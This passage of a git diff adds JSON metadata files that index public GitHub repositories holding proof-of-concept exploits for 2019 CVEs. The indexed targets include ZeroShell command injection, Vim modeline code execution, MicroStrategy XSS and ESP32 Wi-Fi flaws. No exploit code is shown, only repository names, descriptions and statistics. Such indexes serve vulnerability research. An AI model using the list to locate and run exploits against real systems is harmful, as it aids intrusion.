"BaiHLiu\/RuoYI-4.2-Shiro-721-Docker-PoC", + "owner": { + "login": "BaiHLiu", + "id": 31313391, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31313391?v=4", + "html_url": "https:\/\/github.com\/BaiHLiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/BaiHLiu\/RuoYI-4.2-Shiro-721-Docker-PoC", + "description": "若依4.2 (Shiro 1.4.1) Shiro-721 (CVE-2019-12422)漏洞复现环境", + "fork": false, + "created_at": "2024-11-08T12:30:13Z", + "updated_at": "2024-11-25T01:38:58Z", + "pushed_at": "2024-11-25T01:38:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12453.json b/2019/CVE-2019-12453.json new file mode 100644 index 0000000000..963a08782c --- /dev/null +++ b/2019/CVE-2019-12453.json @@ -0,0 +1,33 @@ +[ + { + "id": 197012907, + "name": "CVE-2019-12453", + "full_name": "undefinedmode\/CVE-2019-12453", + "owner": { + "login": "undefinedmode", + "id": 4165481, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4165481?v=4", + "html_url": "https:\/\/github.com\/undefinedmode", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/undefinedmode\/CVE-2019-12453", + "description": "Authenticated XSS in Microstrategy Web - Versions prior to 10.1 patch 10", + "fork": false, + "created_at": "2019-07-15T14:17:10Z", + "updated_at": "2024-08-12T19:51:05Z", + "pushed_at": "2019-07-15T14:44:47Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12460.json b/2019/CVE-2019-12460.json new file mode 100644 index 0000000000..c8e71bff13 --- /dev/null +++ b/2019/CVE-2019-12460.json @@ -0,0 +1,37 @@ +[ + { + "id": 188212424, + "name": "WebPort-v1.19.1-Reflected-XSS", + "full_name": "EmreOvunc\/WebPort-v1.19.1-Reflected-XSS", + "owner": { + "login": "EmreOvunc", + "id": 15659223, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15659223?v=4", + "html_url": "https:\/\/github.com\/EmreOvunc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/EmreOvunc\/WebPort-v1.19.1-Reflected-XSS", + "description": "CVE-2019-12460|Reflected XSS in WebPort-v1.19.1 impacts users who open a maliciously crafted link or third-party web page.", + "fork": false, + "created_at": "2019-05-23T10:27:49Z", + "updated_at": "2024-08-12T19:49:13Z", + "pushed_at": "2019-05-30T16:21:16Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-12460", + "cve-2019-12461", + "reflected-xss-vulnerabilities" + ], + "visibility": "public", + "forks": 3, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12475.json b/2019/CVE-2019-12475.json new file mode 100644 index 0000000000..463abd4b02 --- /dev/null +++ b/2019/CVE-2019-12475.json @@ -0,0 +1,33 @@ +[ + { + "id": 197017455, + "name": "CVE-2019-12475", + "full_name": "undefinedmode\/CVE-2019-12475", + "owner": { + "login": "undefinedmode", + "id": 4165481, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/4165481?v=4", + "html_url": "https:\/\/github.com\/undefinedmode", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/undefinedmode\/CVE-2019-12475", + "description": "Stored XSS in MicroStrategy Web prior to 10.4.6", + "fork": false, + "created_at": "2019-07-15T14:42:53Z", + "updated_at": "2024-08-12T19:51:05Z", + "pushed_at": "2019-07-15T14:47:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12476.json b/2019/CVE-2019-12476.json new file mode 100644 index 0000000000..3785e6cae4 --- /dev/null +++ b/2019/CVE-2019-12476.json @@ -0,0 +1,33 @@ +[ + { + "id": 191221972, + "name": "CVE-2019-12476", + "full_name": "0katz\/CVE-2019-12476", + "owner": { + "login": "0katz", + "id": 13562857, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13562857?v=4", + "html_url": "https:\/\/github.com\/0katz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0katz\/CVE-2019-12476", + "description": null, + "fork": false, + "created_at": "2019-06-10T18:14:34Z", + "updated_at": "2024-08-12T19:49:54Z", + "pushed_at": "2020-04-20T19:50:22Z", + "stargazers_count": 44, + "watchers_count": 44, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 44, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12489.json b/2019/CVE-2019-12489.json new file mode 100644 index 0000000000..043293aa0c --- /dev/null +++ b/2019/CVE-2019-12489.json @@ -0,0 +1,36 @@ +[ + { + "id": 210551355, + "name": "Fastgate", + "full_name": "garis\/Fastgate", + "owner": { + "login": "garis", + "id": 13544227, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13544227?v=4", + "html_url": "https:\/\/github.com\/garis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/garis\/Fastgate", + "description": "CVE-2019-12489", + "fork": false, + "created_at": "2019-09-24T08:28:34Z", + "updated_at": "2021-08-30T20:01:49Z", + "pushed_at": "2020-01-19T20:39:51Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-12489", + "firmware" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-1253.json b/2019/CVE-2019-1253.json new file mode 100644 index 0000000000..ef7c9da808 --- /dev/null +++ b/2019/CVE-2019-1253.json @@ -0,0 +1,133 @@ +[ + { + "id": 180551311, + "name": "CVE-2019-1253", + "full_name": "rogue-kdc\/CVE-2019-1253", + "owner": { + "login": "rogue-kdc", + "id": 49311295, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49311295?v=4", + "html_url": "https:\/\/github.com\/rogue-kdc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rogue-kdc\/CVE-2019-1253", + "description": null, + "fork": false, + "created_at": "2019-04-10T09:44:38Z", + "updated_at": "2024-08-12T19:47:47Z", + "pushed_at": "2019-09-11T08:46:24Z", + "stargazers_count": 49, + "watchers_count": 49, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 49, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 207780184, + "name": "CVE-2019-1253", + "full_name": "likekabin\/CVE-2019-1253", + "owner": { + "login": "likekabin", + "id": 2469038, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2469038?v=4", + "html_url": "https:\/\/github.com\/likekabin", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/likekabin\/CVE-2019-1253", + "description": null, + "fork": false, + "created_at": "2019-09-11T09:59:22Z", + "updated_at": "2024-08-12T19:52:54Z", + "pushed_at": "2019-09-11T09:59:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 207902814, + "name": "CVE-2019-1253", + "full_name": "padovah4ck\/CVE-2019-1253", + "owner": { + "login": "padovah4ck", + "id": 13963076, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13963076?v=4", + "html_url": "https:\/\/github.com\/padovah4ck", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/padovah4ck\/CVE-2019-1253", + "description": "Poc for CVE-2019-1253", + "fork": false, + "created_at": "2019-09-11T20:40:15Z", + "updated_at": "2024-08-12T19:52:55Z", + "pushed_at": "2021-12-23T16:29:43Z", + "stargazers_count": 154, + "watchers_count": 154, + "has_discussions": false, + "forks_count": 41, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 41, + "watchers": 154, + "score": 0, + "subscribers_count": 6 + }, + { + "id": 207924388, + "name": "CVE-2019-1253", + "full_name": "sgabe\/CVE-2019-1253", + "owner": { + "login": "sgabe", + "id": 5206619, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5206619?v=4", + "html_url": "https:\/\/github.com\/sgabe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sgabe\/CVE-2019-1253", + "description": "AppXSvc Arbitrary File Security Descriptor Overwrite EoP", + "fork": false, + "created_at": "2019-09-11T23:28:59Z", + "updated_at": "2024-08-12T19:52:55Z", + "pushed_at": "2019-09-15T17:09:51Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "elevation-of-privilege", + "eop", + "exploit", + "proof-of-concept", + "vulnerability", + "windows10" + ], + "visibility": "public", + "forks": 5, + "watchers": 19, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12538.json b/2019/CVE-2019-12538.json new file mode 100644 index 0000000000..77f800dc72 --- /dev/null +++ b/2019/CVE-2019-12538.json @@ -0,0 +1,33 @@ +[ + { + "id": 190171110, + "name": "CVE-2019-12538", + "full_name": "tarantula-team\/CVE-2019-12538", + "owner": { + "login": "tarantula-team", + "id": 51333391, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51333391?v=4", + "html_url": "https:\/\/github.com\/tarantula-team", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tarantula-team\/CVE-2019-12538", + "description": null, + "fork": false, + "created_at": "2019-06-04T09:32:10Z", + "updated_at": "2024-08-12T19:49:40Z", + "pushed_at": "2019-11-19T08:18:51Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12541.json b/2019/CVE-2019-12541.json new file mode 100644 index 0000000000..6fc274699e --- /dev/null +++ b/2019/CVE-2019-12541.json @@ -0,0 +1,33 @@ +[ + { + "id": 190172498, + "name": "CVE-2019-12541", + "full_name": "tarantula-team\/CVE-2019-12541", + "owner": { + "login": "tarantula-team", + "id": 51333391, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51333391?v=4", + "html_url": "https:\/\/github.com\/tarantula-team", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tarantula-team\/CVE-2019-12541", + "description": null, + "fork": false, + "created_at": "2019-06-04T09:40:20Z", + "updated_at": "2024-08-12T19:49:40Z", + "pushed_at": "2019-11-19T08:17:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12542.json b/2019/CVE-2019-12542.json new file mode 100644 index 0000000000..7527a29c66 --- /dev/null +++ b/2019/CVE-2019-12542.json @@ -0,0 +1,33 @@ +[ + { + "id": 190173583, + "name": "CVE-2019-12542", + "full_name": "tarantula-team\/CVE-2019-12542", + "owner": { + "login": "tarantula-team", + "id": 51333391, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51333391?v=4", + "html_url": "https:\/\/github.com\/tarantula-team", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tarantula-team\/CVE-2019-12542", + "description": null, + "fork": false, + "created_at": "2019-06-04T09:46:51Z", + "updated_at": "2024-08-12T19:49:40Z", + "pushed_at": "2019-11-19T08:17:48Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12543.json b/2019/CVE-2019-12543.json new file mode 100644 index 0000000000..57d6c600d4 --- /dev/null +++ b/2019/CVE-2019-12543.json @@ -0,0 +1,33 @@ +[ + { + "id": 190174353, + "name": "CVE-2019-12543", + "full_name": "tarantula-team\/CVE-2019-12543", + "owner": { + "login": "tarantula-team", + "id": 51333391, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51333391?v=4", + "html_url": "https:\/\/github.com\/tarantula-team", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/tarantula-team\/CVE-2019-12543", + "description": null, + "fork": false, + "created_at": "2019-06-04T09:51:42Z", + "updated_at": "2024-08-12T19:49:40Z", + "pushed_at": "2019-11-19T08:18:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12562.json b/2019/CVE-2019-12562.json new file mode 100644 index 0000000000..3fa961a5ee --- /dev/null +++ b/2019/CVE-2019-12562.json @@ -0,0 +1,33 @@ +[ + { + "id": 212626761, + "name": "CVE-2019-12562", + "full_name": "MAYASEVEN\/CVE-2019-12562", + "owner": { + "login": "MAYASEVEN", + "id": 1219852, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1219852?v=4", + "html_url": "https:\/\/github.com\/MAYASEVEN", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MAYASEVEN\/CVE-2019-12562", + "description": "Stored Cross-Site Scripting in DotNetNuke (DNN) Version before 9.4.0 | XSS to RCE", + "fork": false, + "created_at": "2019-10-03T16:29:58Z", + "updated_at": "2023-07-02T13:04:38Z", + "pushed_at": "2019-10-03T17:28:50Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 8, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12586.json b/2019/CVE-2019-12586.json new file mode 100644 index 0000000000..068ce55f38 --- /dev/null +++ b/2019/CVE-2019-12586.json @@ -0,0 +1,39 @@ +[ + { + "id": 206106300, + "name": "esp32_esp8266_attacks", + "full_name": "Matheus-Garbelini\/esp32_esp8266_attacks", + "owner": { + "login": "Matheus-Garbelini", + "id": 6465668, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6465668?v=4", + "html_url": "https:\/\/github.com\/Matheus-Garbelini", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Matheus-Garbelini\/esp32_esp8266_attacks", + "description": "Proof of Concept of ESP32\/8266 Wi-Fi vulnerabilties (CVE-2019-12586, CVE-2019-12587, CVE-2019-12588)", + "fork": false, + "created_at": "2019-09-03T15:08:49Z", + "updated_at": "2024-11-14T11:42:08Z", + "pushed_at": "2019-09-08T06:09:11Z", + "stargazers_count": 797, + "watchers_count": 797, + "has_discussions": false, + "forks_count": 69, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "crash", + "esp32", + "esp8266", + "hijack", + "vulnerabilities" + ], + "visibility": "public", + "forks": 69, + "watchers": 797, + "score": 0, + "subscribers_count": 34 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12594.json b/2019/CVE-2019-12594.json new file mode 100644 index 0000000000..d4ecf93124 --- /dev/null +++ b/2019/CVE-2019-12594.json @@ -0,0 +1,41 @@ +[ + { + "id": 194123487, + "name": "CVE-2019-12594", + "full_name": "Alexandre-Bartel\/CVE-2019-12594", + "owner": { + "login": "Alexandre-Bartel", + "id": 655248, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/655248?v=4", + "html_url": "https:\/\/github.com\/Alexandre-Bartel", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alexandre-Bartel\/CVE-2019-12594", + "description": "This is a PoC for CVE-2019-12594, a vulnerability in DOSBox 0.74-2.", + "fork": false, + "created_at": "2019-06-27T15:49:16Z", + "updated_at": "2024-08-12T19:50:31Z", + "pushed_at": "2019-07-01T17:36:42Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "dos", + "dosbox", + "exploit", + "poc", + "proof-of-concept", + "vulnerability" + ], + "visibility": "public", + "forks": 4, + "watchers": 12, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12616.json b/2019/CVE-2019-12616.json new file mode 100644 index 0000000000..5bdae2f9fb --- /dev/null +++ b/2019/CVE-2019-12616.json @@ -0,0 +1,42 @@ +[ + { + "id": 809406995, + "name": "CVE-2019-12616", + "full_name": "Cappricio-Securities\/CVE-2019-12616", + "owner": { + "login": "Cappricio-Securities", + "id": 102907425, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102907425?v=4", + "html_url": "https:\/\/github.com\/Cappricio-Securities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Cappricio-Securities\/CVE-2019-12616", + "description": "phpMyAdmin <4.9.0 - Cross-Site Request Forgery", + "fork": false, + "created_at": "2024-06-02T15:50:16Z", + "updated_at": "2024-07-09T15:47:48Z", + "pushed_at": "2024-06-24T10:10:24Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bugbounty-tools", + "csrf", + "csrf-scanner", + "cve-2019-12616", + "cve-2019-12616-poc", + "cve-2019-12616-scanner", + "phpmyadmin-exploit", + "phpmyadmin-scanner" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12725.json b/2019/CVE-2019-12725.json new file mode 100644 index 0000000000..0fea962b68 --- /dev/null +++ b/2019/CVE-2019-12725.json @@ -0,0 +1,130 @@ +[ + { + "id": 361970258, + "name": "CVE-2019-12725", + "full_name": "givemefivw\/CVE-2019-12725", + "owner": { + "login": "givemefivw", + "id": 65514141, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65514141?v=4", + "html_url": "https:\/\/github.com\/givemefivw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/givemefivw\/CVE-2019-12725", + "description": "CVE-2019-12725 ZeroShell 远程命令执行漏洞", + "fork": false, + "created_at": "2021-04-27T03:36:33Z", + "updated_at": "2022-05-17T02:20:21Z", + "pushed_at": "2021-07-02T06:51:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 369719890, + "name": "PocList", + "full_name": "sma11new\/PocList", + "owner": { + "login": "sma11new", + "id": 53944964, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53944964?v=4", + "html_url": "https:\/\/github.com\/sma11new", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/sma11new\/PocList", + "description": "漏洞POC、EXP合集,持续更新。Apache Druid-任意文件读取(CVE-2021-36749)、ConfluenceRCE(CVE-2021-26084)、ZeroShell防火墙RCE(CVE-2019-12725)、ApacheSolr任意文件读取、蓝凌OA任意文件读取、phpStudyRCE、ShowDoc任意文件上传、原创先锋后台未授权、Kyan账号密码泄露、TerraMasterTos任意文件读取、TamronOS-IPTV系统RCE、Wayos防火墙账号密码泄露", + "fork": false, + "created_at": "2021-05-22T05:06:33Z", + "updated_at": "2024-11-18T08:00:32Z", + "pushed_at": "2021-11-21T10:34:06Z", + "stargazers_count": 169, + "watchers_count": 169, + "has_discussions": false, + "forks_count": 38, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2019-12725", + "cve-2021-26084", + "cve-2021-36749" + ], + "visibility": "public", + "forks": 38, + "watchers": 169, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 376662727, + "name": "CVE-2019-12725-Command-Injection", + "full_name": "hev0x\/CVE-2019-12725-Command-Injection", + "owner": { + "login": "hev0x", + "id": 6265911, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6265911?v=4", + "html_url": "https:\/\/github.com\/hev0x", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hev0x\/CVE-2019-12725-Command-Injection", + "description": "ZeroShell 3.9.0 Remote Command Injection", + "fork": false, + "created_at": "2021-06-13T23:57:37Z", + "updated_at": "2024-08-12T20:13:55Z", + "pushed_at": "2021-06-14T00:07:52Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 394525894, + "name": "CVE-2019-12725", + "full_name": "gougou123-hash\/CVE-2019-12725", + "owner": { + "login": "gougou123-hash", + "id": 62822769, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62822769?v=4", + "html_url": "https:\/\/github.com\/gougou123-hash", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gougou123-hash\/CVE-2019-12725", + "description": "ZeroShell命令执行漏洞批量扫描poc+exp", + "fork": false, + "created_at": "2021-08-10T04:39:39Z", + "updated_at": "2023-07-25T07:52:27Z", + "pushed_at": "2021-06-29T06:26:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12735.json b/2019/CVE-2019-12735.json new file mode 100644 index 0000000000..cdeeeae539 --- /dev/null +++ b/2019/CVE-2019-12735.json @@ -0,0 +1,157 @@ +[ + { + "id": 190523226, + "name": "ace-vim-neovim", + "full_name": "pcy190\/ace-vim-neovim", + "owner": { + "login": "pcy190", + "id": 40729789, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40729789?v=4", + "html_url": "https:\/\/github.com\/pcy190", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/pcy190\/ace-vim-neovim", + "description": "Vim\/Neovim Arbitrary Code Execution via Modelines (CVE-2019-12735)", + "fork": false, + "created_at": "2019-06-06T06:00:06Z", + "updated_at": "2024-08-12T19:49:45Z", + "pushed_at": "2019-06-06T06:09:56Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 192580764, + "name": "CVE-2019-12735-VIM-NEOVIM", + "full_name": "oldthree3\/CVE-2019-12735-VIM-NEOVIM", + "owner": { + "login": "oldthree3", + "id": 51964995, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51964995?v=4", + "html_url": "https:\/\/github.com\/oldthree3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/oldthree3\/CVE-2019-12735-VIM-NEOVIM", + "description": null, + "fork": false, + "created_at": "2019-06-18T16:59:39Z", + "updated_at": "2024-08-12T19:50:11Z", + "pushed_at": "2019-06-19T07:30:03Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 307257958, + "name": "CVE-2019-12735", + "full_name": "datntsec\/CVE-2019-12735", + "owner": { + "login": "datntsec", + "id": 70559607, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70559607?v=4", + "html_url": "https:\/\/github.com\/datntsec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/datntsec\/CVE-2019-12735", + "description": null, + "fork": false, + "created_at": "2020-10-26T04:07:20Z", + "updated_at": "2023-04-17T08:55:04Z", + "pushed_at": "2020-10-27T04:07:27Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 369117293, + "name": "cve-2019-12735", + "full_name": "nickylimjj\/cve-2019-12735", + "owner": { + "login": "nickylimjj", + "id": 12999836, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12999836?v=4", + "html_url": "https:\/\/github.com\/nickylimjj", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nickylimjj\/cve-2019-12735", + "description": "Docker image that lets me study the exploitation of the VIM exploit", + "fork": false, + "created_at": "2021-05-20T07:18:49Z", + "updated_at": "2021-08-04T19:41:06Z", + "pushed_at": "2021-05-28T05:25:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 517981801, + "name": "CVE-2019-12735", + "full_name": "st9007a\/CVE-2019-12735", + "owner": { + "login": "st9007a", + "id": 14332895, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14332895?v=4", + "html_url": "https:\/\/github.com\/st9007a", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/st9007a\/CVE-2019-12735", + "description": "A demo for cve-2019-12735", + "fork": false, + "created_at": "2022-07-26T08:45:21Z", + "updated_at": "2022-07-26T08:46:19Z", + "pushed_at": "2022-07-26T08:47:36Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12744.json b/2019/CVE-2019-12744.json new file mode 100644 index 0000000000..5f0438d23b --- /dev/null +++ b/2019/CVE-2019-12744.json @@ -0,0 +1,33 @@ +[ + { + "id": 379925380, + "name": "CVE-2019-12744", + "full_name": "nobodyatall648\/CVE-2019-12744", + "owner": { + "login": "nobodyatall648", + "id": 35725871, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35725871?v=4", + "html_url": "https:\/\/github.com\/nobodyatall648", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nobodyatall648\/CVE-2019-12744", + "description": "Remote Command Execution through Unvalidated File Upload in SeedDMS versions <5.1.11", + "fork": false, + "created_at": "2021-06-24T12:58:02Z", + "updated_at": "2021-06-24T23:11:45Z", + "pushed_at": "2021-06-24T23:11:43Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12750.json b/2019/CVE-2019-12750.json new file mode 100644 index 0000000000..20c1b2ba85 --- /dev/null +++ b/2019/CVE-2019-12750.json @@ -0,0 +1,33 @@ +[ + { + "id": 229357043, + "name": "cve-2019-12750", + "full_name": "v-p-b\/cve-2019-12750", + "owner": { + "login": "v-p-b", + "id": 540246, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/540246?v=4", + "html_url": "https:\/\/github.com\/v-p-b", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/v-p-b\/cve-2019-12750", + "description": "sploit", + "fork": false, + "created_at": "2019-12-21T00:44:25Z", + "updated_at": "2024-08-12T19:55:55Z", + "pushed_at": "2019-12-21T00:56:27Z", + "stargazers_count": 67, + "watchers_count": 67, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 67, + "score": 0, + "subscribers_count": 4 + } +] \ No newline at end of file diff --git a/2019/CVE-2019-12796.json b/2019/CVE-2019-12796.json new file mode 100644 index 